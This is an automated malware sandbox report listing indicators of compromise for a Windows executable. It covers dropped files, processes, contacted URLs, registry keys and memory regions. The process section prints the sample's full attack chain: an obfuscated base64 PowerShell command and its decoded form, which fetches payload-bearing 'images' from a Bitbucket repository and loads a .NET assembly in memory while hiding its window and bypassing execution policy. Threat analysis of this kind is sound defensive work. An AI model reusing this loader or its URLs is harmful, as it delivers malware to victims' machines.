IOC Report
nTHivMbGpg.exe

loading gif

Files

File Path
Type
Category
Malicious
nTHivMbGpg.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\IXP000.TMP\124.bat
DOS batch file, Unicode text, UTF-8 text, with very long lines (720), with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0v4gvuu.crw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brg1lxea.r1u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jarhvwm1.yb2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg4arvxn.3qi.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\nTHivMbGpg.exe
"C:\Users\user\Desktop\nTHivMbGpg.exe"
malicious
C:\Windows\System32\cmd.exe
cmd /c 124.bat
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"

URLs

Name
IP
Malicious
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723
185.166.143.50
malicious
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721
185.166.143.50
malicious
https://bitbucket.org
unknown
malicious
http://crl.microsoft
unknown
https://admin.atlassian.com
unknown
https://contoso.com/License
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds
unknown
https://api.bitbucket.org
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpac
unknown
https://preferences.atlassian.com
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack
unknown
https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
unknown
https://bitbucket.status.atlassian.com/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpacp
unknown
https://oneget.orgX
unknown
https://id.atlassian.com/profile/rest/profile&quot;
unknown
https://aui-cdn.atlassian.com/
unknown
https://bitbucket.org/gateway/api/emoji/
unknown
https://bqlf8qjztdtr.statuspage.io
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://id.atlassian.com/login
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://id.atlassian.com/logout
unknown
http://bitbucket.org
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj
unknown
https://contoso.com/Icon
unknown
https://dz8aopenkvv6s.cloudfront.net
unknown
https://github.com/Pester/Pester
unknown
https://id.atlassian.com/manage-profile/
unknown
https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/
unknown
https://cdn.cookielaw.org/
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
unknown
https://aka.ms/pscore68
unknown
https://oneget.org
unknown
There are 42 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bitbucket.org
185.166.143.50
malicious

IPs

IP
Domain
Country
Malicious
185.166.143.50
bitbucket.org
Germany
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
wextract_cleanup0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFB1E3B6000
unkown
page readonly
2ADC8F8000
stack
page read and write
2712F73D000
heap
page read and write
7FFAACCC0000
trusted library allocation
page read and write
7FFAACB90000
trusted library allocation
page read and write
17DBB0B1000
heap
page read and write
7FFAACC40000
trusted library allocation
page read and write
CF00ABE000
stack
page read and write
2ADC6FF000
stack
page read and write
17DBCB80000
heap
page readonly
CF00E3E000
stack
page read and write
21ED5B00000
heap
page read and write
2712F72F000
heap
page read and write
27132D60000
trusted library allocation
page read and write
17DBCD5D000
trusted library allocation
page read and write
21ED5940000
heap
page read and write
7FFAAC9F3000
trusted library allocation
page execute and read and write
7FFAACC70000
trusted library allocation
page read and write
271332D7000
trusted library allocation
page read and write
27131125000
heap
page read and write
27149901000
heap
page read and write
27149870000
heap
page read and write
27132F2C000
trusted library allocation
page read and write
2ADCB7E000
stack
page read and write
2714993E000
heap
page read and write
21ED7978000
heap
page read and write
17DBB0AA000
heap
page read and write
271417A2000
trusted library allocation
page read and write
2ADC5FD000
stack
page read and write
17DBCEAE000
trusted library allocation
page read and write
252430E7000
heap
page read and write
7FFAACAAC000
trusted library allocation
page execute and read and write
17DBB128000
heap
page read and write
17DD5275000
heap
page read and write
2714973F000
heap
page read and write
271310B3000
trusted library allocation
page read and write
27131120000
heap
page read and write
252432F0000
heap
page read and write
17DBCD30000
heap
page read and write
7FFAACC80000
trusted library allocation
page read and write
7FF6FD219000
unkown
page readonly
27132225000
trusted library allocation
page read and write
7FFAACC50000
trusted library allocation
page read and write
CF00CBE000
stack
page read and write
21ED5940000
heap
page read and write
17DBD149000
trusted library allocation
page read and write
17DD5249000
heap
page read and write
CF00EBC000
stack
page read and write
7FFAACA30000
trusted library allocation
page read and write
17DBCE6B000
trusted library allocation
page read and write
7FFAACBAA000
trusted library allocation
page read and write
17DD52B0000
heap
page execute and read and write
CF00B37000
stack
page read and write
27149700000
heap
page read and write
27132CDC000
trusted library allocation
page read and write
CF00673000
stack
page read and write
B77879E000
stack
page read and write
21ED5940000
heap
page read and write
7FFAACC00000
trusted library allocation
page read and write
27132CE5000
trusted library allocation
page read and write
7FFAACBE0000
trusted library allocation
page execute and read and write
CF0077E000
stack
page read and write
CF008FE000
stack
page read and write
271332D3000
trusted library allocation
page read and write
17DD5390000
heap
page read and write
17DBB3E5000
heap
page read and write
7FFAACBA1000
trusted library allocation
page read and write
27149945000
heap
page read and write
7FFAACBD1000
trusted library allocation
page read and write
27132C25000
trusted library allocation
page read and write
17DBB07E000
heap
page read and write
7FFAACC70000
trusted library allocation
page read and write
17DBCB50000
trusted library allocation
page read and write
271497C0000
heap
page read and write
17DD5380000
heap
page execute and read and write
7FFAAC9FD000
trusted library allocation
page execute and read and write
17DD51FD000
heap
page read and write
2712F640000
heap
page read and write
21ED5900000
heap
page read and write
2712F6E2000
heap
page read and write
17DD51F1000
heap
page read and write
B778A7E000
stack
page read and write
7FFAACCB0000
trusted library allocation
page read and write
17DBB220000
heap
page read and write
27149880000
heap
page read and write
21ED593C000
heap
page read and write
17DBCDD4000
trusted library allocation
page read and write
17DBCE65000
trusted library allocation
page read and write
7FFAACC10000
trusted library allocation
page execute and read and write
7FFAACC50000
trusted library allocation
page read and write
21ED5C85000
heap
page read and write
21ED5934000
heap
page read and write
7FFAACC90000
trusted library allocation
page read and write
7FFB1E3C0000
unkown
page read and write
17DBB11B000
heap
page read and write
17DD5265000
heap
page read and write
27131825000
trusted library allocation
page read and write
CF00BB9000
stack
page read and write
2ADC877000
stack
page read and write
CECBB7E000
stack
page read and write
2712F6C0000
trusted library allocation
page read and write
2712F74D000
heap
page read and write
2ADC67E000
stack
page read and write
25242FF0000
heap
page read and write
271310F0000
trusted library allocation
page read and write
2712F73B000
heap
page read and write
CF00D3E000
stack
page read and write
27133078000
trusted library allocation
page read and write
17DBCE79000
trusted library allocation
page read and write
7FFAACCC0000
trusted library allocation
page read and write
7FFAACA24000
trusted library allocation
page read and write
7FFAACBE0000
trusted library allocation
page execute and read and write
2714975C000
heap
page read and write
17DBCA56000
heap
page read and write
21ED5910000
heap
page read and write
7FFAACBF0000
trusted library allocation
page read and write
7FFAACC80000
trusted library allocation
page read and write
2ADC1BE000
stack
page read and write
2712F6E0000
heap
page read and write
7FFAACA3B000
trusted library allocation
page read and write
7FFAACAB0000
trusted library allocation
page execute and read and write
7FFAACBDA000
trusted library allocation
page read and write
2712F775000
heap
page read and write
7FFAACB06000
trusted library allocation
page execute and read and write
17DD5387000
heap
page execute and read and write
271497E4000
heap
page read and write
2712F510000
heap
page read and write
27149867000
heap
page execute and read and write
27132D64000
trusted library allocation
page read and write
27149936000
heap
page read and write
27132CED000
trusted library allocation
page read and write
CF0087D000
stack
page read and write
2ADC87E000
stack
page read and write
7FFAACAE0000
trusted library allocation
page execute and read and write
7FFAACBC0000
trusted library allocation
page execute and read and write
7FFAACC20000
trusted library allocation
page read and write
17DBD15D000
trusted library allocation
page read and write
27130FA8000
heap
page read and write
7FFAACD10000
trusted library allocation
page read and write
2712F712000
heap
page read and write
271415F1000
trusted library allocation
page read and write
252430E0000
heap
page read and write
27149830000
heap
page read and write
17DBCDAA000
trusted library allocation
page read and write
27132D1F000
trusted library allocation
page read and write
25243200000
heap
page read and write
7FFAACA22000
trusted library allocation
page read and write
17DD5273000
heap
page read and write
7FFAACD70000
trusted library allocation
page read and write
17DBB030000
heap
page read and write
271495F3000
heap
page read and write
CF0097E000
stack
page read and write
17DD51BC000
heap
page read and write
B77871C000
stack
page read and write
17DBD16F000
trusted library allocation
page read and write
CF0188E000
stack
page read and write
27149918000
heap
page read and write
2712F610000
heap
page read and write
17DBD28F000
trusted library allocation
page read and write
2ADCAFF000
stack
page read and write
7FFAACAD6000
trusted library allocation
page read and write
2712F739000
heap
page read and write
21ED7778000
heap
page read and write
17DCCD50000
trusted library allocation
page read and write
17DBD108000
trusted library allocation
page read and write
2ADC47E000
stack
page read and write
17DBD2DE000
trusted library allocation
page read and write
7FF6FD21C000
unkown
page write copy
7FF6FD21C000
unkown
page read and write
21ED592B000
heap
page read and write
CF00C3A000
stack
page read and write
17DBCE73000
trusted library allocation
page read and write
7FFB1E3A1000
unkown
page execute read
2712F72D000
heap
page read and write
7FFAACA2D000
trusted library allocation
page execute and read and write
17DD5190000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page read and write
CF00DBE000
stack
page read and write
7FFAACD00000
trusted library allocation
page read and write
17DBCE68000
trusted library allocation
page read and write
17DBCC00000
trusted library allocation
page read and write
2713320E000
trusted library allocation
page read and write
7FFAAC9F2000
trusted library allocation
page read and write
17DBB010000
heap
page read and write
271498EB000
heap
page read and write
7FF6FD210000
unkown
page readonly
7FFB1E3C2000
unkown
page readonly
7DF40FA70000
trusted library allocation
page execute and read and write
2ADC979000
stack
page read and write
CF007FE000
stack
page read and write
2712F77A000
heap
page read and write
7FFAACCA0000
trusted library allocation
page read and write
2ADCBFB000
stack
page read and write
17DBB3E0000
heap
page read and write
17DD5237000
heap
page read and write
27132F01000
trusted library allocation
page read and write
7FFAACCD0000
trusted library allocation
page read and write
252431E0000
heap
page read and write
7FFAACD90000
trusted library allocation
page read and write
7FFAACC60000
trusted library allocation
page read and write
17DBCA30000
heap
page read and write
7FF6FD210000
unkown
page readonly
17DBB200000
heap
page read and write
17DBD0E0000
trusted library allocation
page read and write
27141600000
trusted library allocation
page read and write
7FFAACC90000
trusted library allocation
page read and write
7FFB1E3C0000
unkown
page read and write
2712F660000
heap
page read and write
7FFAACD50000
trusted library allocation
page read and write
17DBD3E6000
trusted library allocation
page read and write
7FFAACA23000
trusted library allocation
page execute and read and write
17DBD22E000
trusted library allocation
page read and write
7FFB1E3C5000
unkown
page readonly
7FFB1E3A0000
unkown
page readonly
2ADC7F9000
stack
page read and write
17DBD256000
trusted library allocation
page read and write
7FFAACAD6000
trusted library allocation
page execute and read and write
7FFAACD10000
trusted library allocation
page read and write
27141660000
trusted library allocation
page read and write
17DBB041000
heap
page read and write
7FFAACD20000
trusted library allocation
page read and write
7FFAAC9F4000
trusted library allocation
page read and write
271315F1000
trusted library allocation
page read and write
25244C50000
heap
page read and write
27132CE9000
trusted library allocation
page read and write
2ADC1FE000
stack
page read and write
7FFAACB10000
trusted library allocation
page execute and read and write
271498E8000
heap
page read and write
7FFAACD80000
trusted library allocation
page read and write
7FFAACCD0000
trusted library allocation
page read and write
271310B0000
trusted library allocation
page read and write
2ADCA7E000
stack
page read and write
27132CC9000
trusted library allocation
page read and write
7FF6FD21E000
unkown
page readonly
7FFAACC40000
trusted library allocation
page read and write
17DCCD41000
trusted library allocation
page read and write
2712F731000
heap
page read and write
CECBBFF000
stack
page read and write
27131520000
heap
page read and write
27132CC5000
trusted library allocation
page read and write
7FFAACD30000
trusted library allocation
page read and write
2712F645000
heap
page read and write
27149923000
heap
page read and write
7FFAACAD0000
trusted library allocation
page read and write
17DBCA05000
heap
page read and write
21ED5AE0000
heap
page read and write
CF0190D000
stack
page read and write
17DD53BD000
heap
page read and write
17DBD120000
trusted library allocation
page read and write
17DBD181000
trusted library allocation
page read and write
17DBD3F0000
trusted library allocation
page read and write
7FF6FD211000
unkown
page execute read
7FFAACCE0000
trusted library allocation
page read and write
271315E0000
heap
page execute and read and write
7FFAACC20000
trusted library allocation
page read and write
17DD51DA000
heap
page read and write
7FFAACBD2000
trusted library allocation
page read and write
7FFAACC02000
trusted library allocation
page read and write
17DBD266000
trusted library allocation
page read and write
CECBA7C000
stack
page read and write
252432F5000
heap
page read and write
21ED593C000
heap
page read and write
7FFAACBF0000
trusted library allocation
page execute and read and write
7FFAACBB0000
trusted library allocation
page execute and read and write
17DBD137000
trusted library allocation
page read and write
7FFAACCB0000
trusted library allocation
page read and write
271498B2000
heap
page read and write
17DBD3F9000
trusted library allocation
page read and write
17DCCDAF000
trusted library allocation
page read and write
21ED5C80000
heap
page read and write
2714977F000
heap
page read and write
2712F5F0000
heap
page read and write
27130FA6000
heap
page read and write
7FFAACC10000
trusted library allocation
page read and write
7FF6FD211000
unkown
page execute read
7FFAACD00000
trusted library allocation
page read and write
7FF6FD219000
unkown
page readonly
7FFAACCF0000
trusted library allocation
page read and write
7FFAACCA0000
trusted library allocation
page read and write
7FFAACC60000
trusted library allocation
page read and write
7FFAACADC000
trusted library allocation
page execute and read and write
7FF6FD21E000
unkown
page readonly
2ADC57E000
stack
page read and write
CF009FE000
stack
page read and write
17DBCA10000
heap
page read and write
2ADC4FF000
stack
page read and write
17DBD12F000
trusted library allocation
page read and write
7FFAACD60000
trusted library allocation
page read and write
21ED5917000
heap
page read and write
CF006FE000
stack
page read and write
17DD5300000
heap
page read and write
7FFAACB40000
trusted library allocation
page execute and read and write
7FFAACCE0000
trusted library allocation
page read and write
27132DA2000
trusted library allocation
page read and write
17DBCB70000
trusted library allocation
page read and write
2ADC77E000
stack
page read and write
2712F6EB000
heap
page read and write
17DBCE62000
trusted library allocation
page read and write
27130F80000
heap
page read and write
21ED593E000
heap
page read and write
17DBCA00000
heap
page read and write
2712F6D0000
heap
page readonly
7FFAACB92000
trusted library allocation
page read and write
2714974C000
heap
page read and write
271498DD000
heap
page read and write
2712F6A0000
trusted library allocation
page read and write
271315A0000
heap
page execute and read and write
17DBCCF0000
heap
page execute and read and write
7FFAACBC0000
trusted library allocation
page read and write
7FFAACCF0000
trusted library allocation
page read and write
2ADC9FE000
stack
page read and write
17DBCD41000
trusted library allocation
page read and write
27132DAE000
trusted library allocation
page read and write
17DBB080000
heap
page read and write
27132F88000
trusted library allocation
page read and write
2713167C000
trusted library allocation
page read and write
7FFAACA00000
trusted library allocation
page read and write
2ADC133000
stack
page read and write
7FFAACC30000
trusted library allocation
page read and write
7FFAACAA6000
trusted library allocation
page read and write
CF00A79000
stack
page read and write
27149860000
heap
page execute and read and write
CECBAFE000
stack
page read and write
7FFAACAA0000
trusted library allocation
page read and write
There are 315 hidden memdumps, click here to show them.